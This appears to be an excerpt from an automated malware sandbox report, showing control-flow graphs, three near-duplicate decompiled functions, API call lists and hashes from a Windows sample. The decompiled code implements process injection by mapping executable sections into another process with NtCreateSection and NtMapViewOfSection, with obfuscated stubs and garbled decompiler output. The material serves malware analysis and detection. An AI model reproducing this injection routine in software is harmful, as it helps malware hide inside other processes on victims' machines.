                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
Control-flow graph (basic blocks with their address range, the API or call they contain, and their successors; reconstructed from the flattened graph dump):
• 317: 401613-40162b, call 401274 -> 323, 324
• 323: 401630-401635 -> 326, 327
• 324: 40162d -> 323
• 326: 401956-40195e -> 323, 330
• 327: 40163b-40164c -> 331, 332
• 330: 401963-4019b3, call 401274
• 331: 401652-40167b -> 332, 339
• 332: 401954 -> 330
• 339: 401681-401698, NtDuplicateObject -> 332, 341
• 341: 40169e-4016c2, NtCreateSection -> 343, 344
• 343: 4016c4-4016e5, NtMapViewOfSection -> 344, 347
• 344: 40171e-401744, NtCreateSection -> 332, 348
• 347: 4016e7-401703, NtMapViewOfSection -> 344, 349
• 348: 40174a-40174e -> 332, 350
• 349: 401705-40171b -> 344
• 350: 401754-401775, NtMapViewOfSection -> 332, 353
• 353: 40177b-401797, NtMapViewOfSection -> 332, 356
• 356: 40179d, call 4017a2
                            C-Code - Quality: 59%
                            			E00401613(void* __ebx, void* __esi, void* __eflags) {
                            				void* _t85;
                            				intOrPtr _t88;
                            				void* _t91;
                            				intOrPtr _t92;
                            				struct _GUID _t99;
                            				struct _GUID _t101;
                            				PVOID* _t103;
                            				PVOID* _t105;
                            				intOrPtr* _t109;
                            				PVOID* _t122;
                            				PVOID* _t124;
                            				intOrPtr _t129;
                            				void** _t132;
                            				signed int _t139;
                            				int _t140;
                            				void* _t158;
                            				signed int _t162;
                            				signed int _t163;
                            				signed int _t164;
                            				signed int _t165;
                            				signed int _t166;
                            				void* _t167;
                            				intOrPtr* _t168;
                            				void* _t171;
                            				intOrPtr _t181;
                            				void* _t182;
                            				void* _t183;
                            				HANDLE* _t189;
                            				HANDLE* _t191;
                            				void* _t196;
                            				intOrPtr* _t199;
                            				void* _t202;
                            				void* _t203;
                            				intOrPtr* _t205;
                            				void* _t209;
                            				long _t224;
                            
                            				L00401274(_t85, 0xf1, __esi, __eflags);
                            				_t129 =  *((intOrPtr*)(_t203 + 8));
                            				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                            				if(gs != 0) {
                            					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                            				}
                            				while(1) {
                            					_t88 =  *((intOrPtr*)(_t129 + 0x48))();
                            					if(_t88 != 0) {
                            						break;
                            					}
                            					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                            				}
                            				 *((intOrPtr*)(_t203 - 0x5c)) = _t88;
                            				_t189 = _t203 - 0x60;
                            				 *_t189 = 0;
                            				 *((intOrPtr*)(_t129 + 0x4c))(_t88, _t189);
                            				_t91 =  *_t189;
                            				if(_t91 != 0) {
                            					_t132 = _t203 - 0x30;
                            					 *_t132 = _t91;
                            					_t132[1] = 0;
                            					_t189 = _t203 - 0x28;
                            					 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
                            					 *_t189 = 0x18;
                            					_push(_t203 - 0x30);
                            					_push(_t189);
                            					_push(0x40);
                            					_push(_t203 - 0x10);
                            					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, 0, 0, 2) == 0) {
                            						 *((intOrPtr*)(_t203 - 8)) = 0;
                            						_t99 = _t203 - 0x50;
                            						 *((intOrPtr*)(_t99 + 4)) = 0;
                            						 *_t99 = 0x5000;
                            						_t191 = _t203 - 0x54;
                            						if(NtCreateSection(_t191, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                            							 *_t25 =  *(_t203 - 0x50);
                            							_t122 = _t203 - 0x44;
                            							 *_t122 = 0;
                            							if(NtMapViewOfSection( *_t191, 0xffffffff, _t122, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                            								_t124 = _t203 - 0x3c;
                            								 *_t124 = 0;
                            								if(NtMapViewOfSection( *_t191,  *(_t203 - 0xc), _t124, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                            									_t202 =  *(_t203 - 0x44);
                            									 *((intOrPtr*)(_t129 + 0x20))(0, _t202, 0x104);
                            									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                            									 *((intOrPtr*)(_t203 - 8)) =  *((intOrPtr*)(_t203 - 8)) + 1;
                            								}
                            							}
                            						}
                            						_t101 = _t203 - 0x50;
                            						 *((intOrPtr*)(_t101 + 4)) = 0;
                            						 *_t101 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                            						_t189 = _t203 - 0x58;
                            						if(NtCreateSection(_t189, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t203 - 8)) != 0) {
                            							 *_t46 =  *(_t203 - 0x50);
                            							_t103 = _t203 - 0x48;
                            							 *_t103 = 0;
                            							if(NtMapViewOfSection( *_t189, 0xffffffff, _t103, 0, 0, 0, _t203 - 0x38, 1, 0, 4) == 0) {
                            								_t105 = _t203 - 0x40;
                            								 *_t105 = 0;
                            								_t224 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t105, 0, 0, 0, _t203 - 0x38, 1, 0, 0x20);
                            								if(_t224 == 0) {
                            									L18();
                            									if(_t224 == 0 && _t224 != 0) {
                            										asm("hlt");
                            										_push(_t205);
                            									}
                            									_push(0x2ea6);
                            									_t209 = _t205 + 4;
                            									_t162 = 0x2260;
                            									_t163 = _t162 << 5;
                            									_t164 = _t163 + 0x2260;
                            									asm("lodsb");
                            									_t165 = _t164;
                            									asm("loop 0xffffffc4");
                            									_t166 = _t165 ^ 0xad610a21;
                            									_t205 = _t209 - _t166;
                            									_t196 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
                            									_t139 =  *(_t196 + 6) & 0x0000ffff;
                            									_push(_t196);
                            									_t167 = _t196;
                            									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                            										_t168 = _t167 + 0xf8;
                            										__eflags = _t168;
                            									} else {
                            										_t168 = _t167 + 0x108;
                            									}
                            									_push(_t139);
                            									_t140 =  *(_t168 + 0x10);
                            									if(_t140 != 0) {
                            										memcpy( *((intOrPtr*)(_t168 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t168 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t140);
                            										_t205 = _t205 + 0xc;
                            									}
                            									asm("loop 0xffffffe6");
                            									_pop(_t189);
                            									_t228 =  *((intOrPtr*)(_t203 - 0x34));
                            									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
                            										_push(_t189);
                            										_t171 = _t189[0xd] -  *(_t203 - 0x40);
                            										_t199 = _t189[0x28] +  *(_t203 - 0x48);
                            										__eflags = _t199;
                            										while(1) {
                            											__eflags =  *_t199;
                            											if( *_t199 == 0) {
                            												break;
                            											}
                            											_t181 =  *_t199;
                            											_t199 = _t199 + 8;
                            											asm("lodsw");
                            											__eflags = 0;
                            											if(0 != 0) {
                            												 *0x00000000 =  *0x00000000 - _t171;
                            												__eflags =  *((intOrPtr*)( *(_t203 - 0x48) + 0 + _t181));
                            											}
                            											asm("loop 0xffffffe9");
                            										}
                            										_pop(_t189);
                            										__eflags = 0;
                            										_t109 = _t203 - 4;
                            										 *_t109 = 0;
                            										 *((intOrPtr*)(_t129 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t109, 0);
                            									} else {
                            										L51();
                            										_pop(_t182);
                            										_t183 = _t182 - 0x1892;
                            										 *((intOrPtr*)(_t183 + 0x18c6)) = _t183 + 0x304c;
                            										L004012E3(_t129, _t228);
                            										0x33(_t183 + 0x304c, 0x1ad);
                            										 *((intOrPtr*)(_t183 + 0x18eb)) = _t183 + 0x309c;
                            										0x33();
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_push(0x161d);
                            				_t92 =  *_t205;
                            				_push(0x392);
                            				_t158 = 0xf1;
                            				return L00401274(_t92, _t158, _t189, _t228);
                            			}

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 22a0d11da6358484d5fb3989fe7d62fe56c3f1842a9ccbaabd161204e5d78bb4
                            • Instruction ID: d304ef28c580210a7a0f2ed53d1cda2a55b28a26347542abe822579cf832a140
                            • Opcode Fuzzy Hash: 22a0d11da6358484d5fb3989fe7d62fe56c3f1842a9ccbaabd161204e5d78bb4
                            • Instruction Fuzzy Hash: 5E51F6B5900249BBEF209F91CC48FEBBBB8EF85B10F100159FA11BA2A5D6749945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 59%
                            			E00401609(void* __esi) {
                            				void* _t86;
                            				intOrPtr _t89;
                            				void* _t92;
                            				void* _t93;
                            				struct _GUID _t100;
                            				struct _GUID _t102;
                            				PVOID* _t104;
                            				PVOID* _t106;
                            				intOrPtr* _t110;
                            				PVOID* _t123;
                            				PVOID* _t125;
                            				intOrPtr _t129;
                            				void** _t132;
                            				signed int _t139;
                            				int _t140;
                            				void* _t157;
                            				signed int _t161;
                            				signed int _t162;
                            				signed int _t163;
                            				signed int _t164;
                            				signed int _t165;
                            				void* _t166;
                            				intOrPtr* _t167;
                            				void* _t170;
                            				intOrPtr _t180;
                            				void* _t181;
                            				void* _t182;
                            				HANDLE* _t188;
                            				HANDLE* _t190;
                            				void* _t195;
                            				intOrPtr* _t198;
                            				void* _t201;
                            				void* _t202;
                            				signed int _t204;
                            				signed int _t205;
                            				void* _t209;
                            				signed int _t210;
                            				long _t224;
                            
                            				_t205 = _t204 |  *(_t202 + 0xf1baef);
                            				_t210 = _t205;
                            				L00401274(_t86, 0xf1, __esi, _t210);
                            				_t129 =  *((intOrPtr*)(_t202 + 8));
                            				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                            				if(gs != 0) {
                            					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                            				}
                            				while(1) {
                            					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
                            					if(_t89 != 0) {
                            						break;
                            					}
                            					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                            				}
                            				 *((intOrPtr*)(_t202 - 0x5c)) = _t89;
                            				_t188 = _t202 - 0x60;
                            				 *_t188 = 0;
                            				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t188);
                            				_t92 =  *_t188;
                            				if(_t92 != 0) {
                            					_t132 = _t202 - 0x30;
                            					 *_t132 = _t92;
                            					_t132[1] = 0;
                            					_t188 = _t202 - 0x28;
                            					 *((intOrPtr*)(_t129 + 0x10))(_t188, 0x18);
                            					 *_t188 = 0x18;
                            					_push(_t202 - 0x30);
                            					_push(_t188);
                            					_push(0x40);
                            					_push(_t202 - 0x10);
                            					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                            						 *((intOrPtr*)(_t202 - 8)) = 0;
                            						_t100 = _t202 - 0x50;
                            						 *((intOrPtr*)(_t100 + 4)) = 0;
                            						 *_t100 = 0x5000;
                            						_t190 = _t202 - 0x54;
                            						if(NtCreateSection(_t190, 6, 0, _t100, 4, 0x8000000, 0) == 0) {
                            							 *_t26 =  *(_t202 - 0x50);
                            							_t123 = _t202 - 0x44;
                            							 *_t123 = 0;
                            							if(NtMapViewOfSection( *_t190, 0xffffffff, _t123, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            								_t125 = _t202 - 0x3c;
                            								 *_t125 = 0;
                            								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t125, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            									_t201 =  *(_t202 - 0x44);
                            									 *((intOrPtr*)(_t129 + 0x20))(0, _t201, 0x104);
                            									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                            									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                            								}
                            							}
                            						}
                            						_t102 = _t202 - 0x50;
                            						 *((intOrPtr*)(_t102 + 4)) = 0;
                            						 *_t102 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                            						_t188 = _t202 - 0x58;
                            						if(NtCreateSection(_t188, 0xe, 0, _t102, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                            							 *_t47 =  *(_t202 - 0x50);
                            							_t104 = _t202 - 0x48;
                            							 *_t104 = 0;
                            							if(NtMapViewOfSection( *_t188, 0xffffffff, _t104, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            								_t106 = _t202 - 0x40;
                            								 *_t106 = 0;
                            								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t106, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                            								if(_t224 == 0) {
                            									L17();
                            									if(_t224 == 0 && _t224 != 0) {
                            										asm("hlt");
                            										_push(_t205);
                            									}
                            									_push(0x2ea6);
                            									_t209 = _t205 + 4;
                            									_t161 = 0x2260;
                            									_t162 = _t161 << 5;
                            									_t163 = _t162 + 0x2260;
                            									asm("lodsb");
                            									_t164 = _t163;
                            									asm("loop 0xffffffc4");
                            									_t165 = _t164 ^ 0xad610a21;
                            									_t205 = _t209 - _t165;
                            									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                            									_t139 =  *(_t195 + 6) & 0x0000ffff;
                            									_push(_t195);
                            									_t166 = _t195;
                            									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                            										_t167 = _t166 + 0xf8;
                            										__eflags = _t167;
                            									} else {
                            										_t167 = _t166 + 0x108;
                            									}
                            									_push(_t139);
                            									_t140 =  *(_t167 + 0x10);
                            									if(_t140 != 0) {
                            										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                            										_t205 = _t205 + 0xc;
                            									}
                            									asm("loop 0xffffffe6");
                            									_pop(_t188);
                            									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                            									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                            										_push(_t188);
                            										_t170 = _t188[0xd] -  *(_t202 - 0x40);
                            										_t198 = _t188[0x28] +  *(_t202 - 0x48);
                            										__eflags = _t198;
                            										while(1) {
                            											__eflags =  *_t198;
                            											if( *_t198 == 0) {
                            												break;
                            											}
                            											_t180 =  *_t198;
                            											_t198 = _t198 + 8;
                            											asm("lodsw");
                            											__eflags = 0;
                            											if(0 != 0) {
                            												 *0x00000000 =  *0x00000000 - _t170;
                            												__eflags =  *((intOrPtr*)( *(_t202 - 0x48) + 0 + _t180));
                            											}
                            											asm("loop 0xffffffe9");
                            										}
                            										_pop(_t188);
                            										__eflags = 0;
                            										_t110 = _t202 - 4;
                            										 *_t110 = 0;
                            										 *((intOrPtr*)(_t129 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0, _t188[0xa] +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t110, 0);
                            									} else {
                            										L50();
                            										_pop(_t181);
                            										_t182 = _t181 - 0x1892;
                            										 *((intOrPtr*)(_t182 + 0x18c6)) = _t182 + 0x304c;
                            										L004012E3(_t129, _t228);
                            										0x33(_t182 + 0x304c, 0x1ad);
                            										 *((intOrPtr*)(_t182 + 0x18eb)) = _t182 + 0x309c;
                            										0x33();
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_push(0x161d);
                            				_t93 =  *_t205;
                            				_push(0x392);
                            				_t157 = 0xf1;
                            				return L00401274(_t93, _t157, _t188, _t228);
                            			}









































                            Address gutter of the decompiled listing (0x00401609 to 0x004019b3); the instruction column was not extracted.

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 1b824d8c98079b7474f717da7855ee102c1ec14f7644c69b0de31e877fc51f42
                            • Instruction ID: 24bf3b641dcec1e8044d3b4c6b67768af5ca568568a0cd1df2bbcc1fae36a819
                            • Opcode Fuzzy Hash: 1b824d8c98079b7474f717da7855ee102c1ec14f7644c69b0de31e877fc51f42
                            • Instruction Fuzzy Hash: BD51F7B5900249BFEF209F95CC48FEBBFB8EF85B10F100159FA11BA2A5D6749944CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 397 401617-40162b call 401274 401 401630-401635 397->401 402 40162d 397->402 404 401956-40195e 401->404 405 40163b-40164c 401->405 402->401 404->401 408 401963-4019b3 call 401274 404->408 409 401652-40167b 405->409 410 401954 405->410 409->410 417 401681-401698 NtDuplicateObject 409->417 410->408 417->410 419 40169e-4016c2 NtCreateSection 417->419 421 4016c4-4016e5 NtMapViewOfSection 419->421 422 40171e-401744 NtCreateSection 419->422 421->422 425 4016e7-401703 NtMapViewOfSection 421->425 422->410 426 40174a-40174e 422->426 425->422 427 401705-40171b 425->427 426->410 428 401754-401775 NtMapViewOfSection 426->428 427->422 428->410 431 40177b-401797 NtMapViewOfSection 428->431 431->410 434 40179d call 4017a2 431->434
                            C-Code - Quality: 58%
                            			E00401617(void* __edx, void* __esi, void* __eflags) {
                            				void* _t85;
                            				intOrPtr _t88;
                            				void* _t91;
                            				intOrPtr _t92;
                            				struct _GUID _t99;
                            				struct _GUID _t101;
                            				PVOID* _t103;
                            				PVOID* _t105;
                            				intOrPtr* _t109;
                            				PVOID* _t122;
                            				PVOID* _t124;
                            				intOrPtr _t128;
                            				void** _t131;
                            				signed int _t138;
                            				int _t139;
                            				void* _t156;
                            				signed int _t160;
                            				signed int _t161;
                            				signed int _t162;
                            				signed int _t163;
                            				signed int _t164;
                            				void* _t165;
                            				intOrPtr* _t166;
                            				void* _t169;
                            				intOrPtr _t179;
                            				void* _t180;
                            				void* _t181;
                            				HANDLE* _t187;
                            				HANDLE* _t189;
                            				void* _t194;
                            				intOrPtr* _t197;
                            				void* _t200;
                            				void* _t201;
                            				intOrPtr* _t203;
                            				void* _t207;
                            				long _t222;
                            
                            				_pop(ss);
                            				L00401274(_t85, __edx, __esi, __eflags);
                            				_t128 =  *((intOrPtr*)(_t201 + 8));
                            				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                            				if(gs != 0) {
                            					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                            				}
                            				while(1) {
                            					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                            					if(_t88 != 0) {
                            						break;
                            					}
                            					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                            				}
                            				 *((intOrPtr*)(_t201 - 0x5c)) = _t88;
                            				_t187 = _t201 - 0x60;
                            				 *_t187 = 0;
                            				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t187);
                            				_t91 =  *_t187;
                            				if(_t91 != 0) {
                            					_t131 = _t201 - 0x30;
                            					 *_t131 = _t91;
                            					_t131[1] = 0;
                            					_t187 = _t201 - 0x28;
                            					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
                            					 *_t187 = 0x18;
                            					_push(_t201 - 0x30);
                            					_push(_t187);
                            					_push(0x40);
                            					_push(_t201 - 0x10);
                            					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, 0, 0, 2) == 0) {
                            						 *((intOrPtr*)(_t201 - 8)) = 0;
                            						_t99 = _t201 - 0x50;
                            						 *((intOrPtr*)(_t99 + 4)) = 0;
                            						 *_t99 = 0x5000;
                            						_t189 = _t201 - 0x54;
                            						if(NtCreateSection(_t189, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                            							 *_t25 =  *(_t201 - 0x50);
                            							_t122 = _t201 - 0x44;
                            							 *_t122 = 0;
                            							if(NtMapViewOfSection( *_t189, 0xffffffff, _t122, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                            								_t124 = _t201 - 0x3c;
                            								 *_t124 = 0;
                            								if(NtMapViewOfSection( *_t189,  *(_t201 - 0xc), _t124, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                            									_t200 =  *(_t201 - 0x44);
                            									 *((intOrPtr*)(_t128 + 0x20))(0, _t200, 0x104);
                            									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                            									 *((intOrPtr*)(_t201 - 8)) =  *((intOrPtr*)(_t201 - 8)) + 1;
                            								}
                            							}
                            						}
                            						_t101 = _t201 - 0x50;
                            						 *((intOrPtr*)(_t101 + 4)) = 0;
                            						 *_t101 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                            						_t187 = _t201 - 0x58;
                            						if(NtCreateSection(_t187, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t201 - 8)) != 0) {
                            							 *_t46 =  *(_t201 - 0x50);
                            							_t103 = _t201 - 0x48;
                            							 *_t103 = 0;
                            							if(NtMapViewOfSection( *_t187, 0xffffffff, _t103, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                            								_t105 = _t201 - 0x40;
                            								 *_t105 = 0;
                            								_t222 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t105, 0, 0, 0, _t201 - 0x38, 1, 0, 0x20);
                            								if(_t222 == 0) {
                            									L16();
                            									if(_t222 == 0 && _t222 != 0) {
                            										asm("hlt");
                            										_push(_t203);
                            									}
                            									_push(0x2ea6);
                            									_t207 = _t203 + 4;
                            									_t160 = 0x2260;
                            									_t161 = _t160 << 5;
                            									_t162 = _t161 + 0x2260;
                            									asm("lodsb");
                            									_t163 = _t162;
                            									asm("loop 0xffffffc4");
                            									_t164 = _t163 ^ 0xad610a21;
                            									_t203 = _t207 - _t164;
                            									_t194 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                            									_t138 =  *(_t194 + 6) & 0x0000ffff;
                            									_push(_t194);
                            									_t165 = _t194;
                            									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                            										_t166 = _t165 + 0xf8;
                            										__eflags = _t166;
                            									} else {
                            										_t166 = _t165 + 0x108;
                            									}
                            									_push(_t138);
                            									_t139 =  *(_t166 + 0x10);
                            									if(_t139 != 0) {
                            										memcpy( *((intOrPtr*)(_t166 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t166 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t139);
                            										_t203 = _t203 + 0xc;
                            									}
                            									asm("loop 0xffffffe6");
                            									_pop(_t187);
                            									_t226 =  *((intOrPtr*)(_t201 - 0x34));
                            									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                            										_push(_t187);
                            										_t169 = _t187[0xd] -  *(_t201 - 0x40);
                            										_t197 = _t187[0x28] +  *(_t201 - 0x48);
                            										__eflags = _t197;
                            										while(1) {
                            											__eflags =  *_t197;
                            											if( *_t197 == 0) {
                            												break;
                            											}
                            											_t179 =  *_t197;
                            											_t197 = _t197 + 8;
                            											asm("lodsw");
                            											__eflags = 0;
                            											if(0 != 0) {
                            												 *0x00000000 =  *0x00000000 - _t169;
                            												__eflags =  *((intOrPtr*)( *(_t201 - 0x48) + 0 + _t179));
                            											}
                            											asm("loop 0xffffffe9");
                            										}
                            										_pop(_t187);
                            										__eflags = 0;
                            										_t109 = _t201 - 4;
                            										 *_t109 = 0;
                            										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0, _t187[0xa] +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t109, 0);
                            									} else {
                            										L49();
                            										_pop(_t180);
                            										_t181 = _t180 - 0x1892;
                            										 *((intOrPtr*)(_t181 + 0x18c6)) = _t181 + 0x304c;
                            										L004012E3(_t128, _t226);
                            										0x33(_t181 + 0x304c, 0x1ad);
                            										 *((intOrPtr*)(_t181 + 0x18eb)) = _t181 + 0x309c;
                            										0x33();
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_push(0x161d);
                            				_t92 =  *_t203;
                            				_push(0x392);
                            				_t156 = 0xf1;
                            				return L00401274(_t92, _t156, _t187, _t226);
                            			}


                            Address gutter of the decompiled listing (0x00401617 to 0x004019b3); the instruction column was not extracted.

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 25f5eb01983d9281b1127e50c890fc92aa8b6165b5d631ffe35390f1c87f28db
                            • Instruction ID: 57dcf3cccefe6a0511f6925536cc6eed8aa77802ca08ef68a5075aa0b4e04b8e
                            • Opcode Fuzzy Hash: 25f5eb01983d9281b1127e50c890fc92aa8b6165b5d631ffe35390f1c87f28db
                            • Instruction Fuzzy Hash: 2851E8B5900249BBEF209F95CC48FEBBFB8EF85B10F100159FA11BA2A5D6709944CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 436 40a22a-40a243 438 40a245-40a248 436->438 439 40a25d-40a261 436->439 440 40a2ed-40a2ef 438->440 441 40a263-40a278 call 40b014 439->441 442 40a24d-40a24f 439->442 441->438 449 40a27a-40a281 441->449 443 40a251 442->443 444 40a252-40a259 call 40b5e0 442->444 443->444 444->439 450 40a2c5-40a2c8 449->450 451 40a283-40a290 call 40b5e0 450->451 452 40a2ca-40a2e9 450->452 457 40a292-40a295 call 40b014 451->457 458 40a2c3 451->458 456 40a2eb-40a2ec 452->456 456->440 460 40a29a-40a2a0 457->460 458->450 461 40a2f0-40a305 460->461 462 40a2a2-40a2af call 40b4db 460->462 461->456 466 40a2c0 462->466 467 40a2b1-40a2bd 462->467 466->458 467->466
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.346386046.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_409000_file.jbxd
                            Similarity
                            • API ID: __calloc_crt
                            • String ID:
                            • API String ID: 3494438863-0
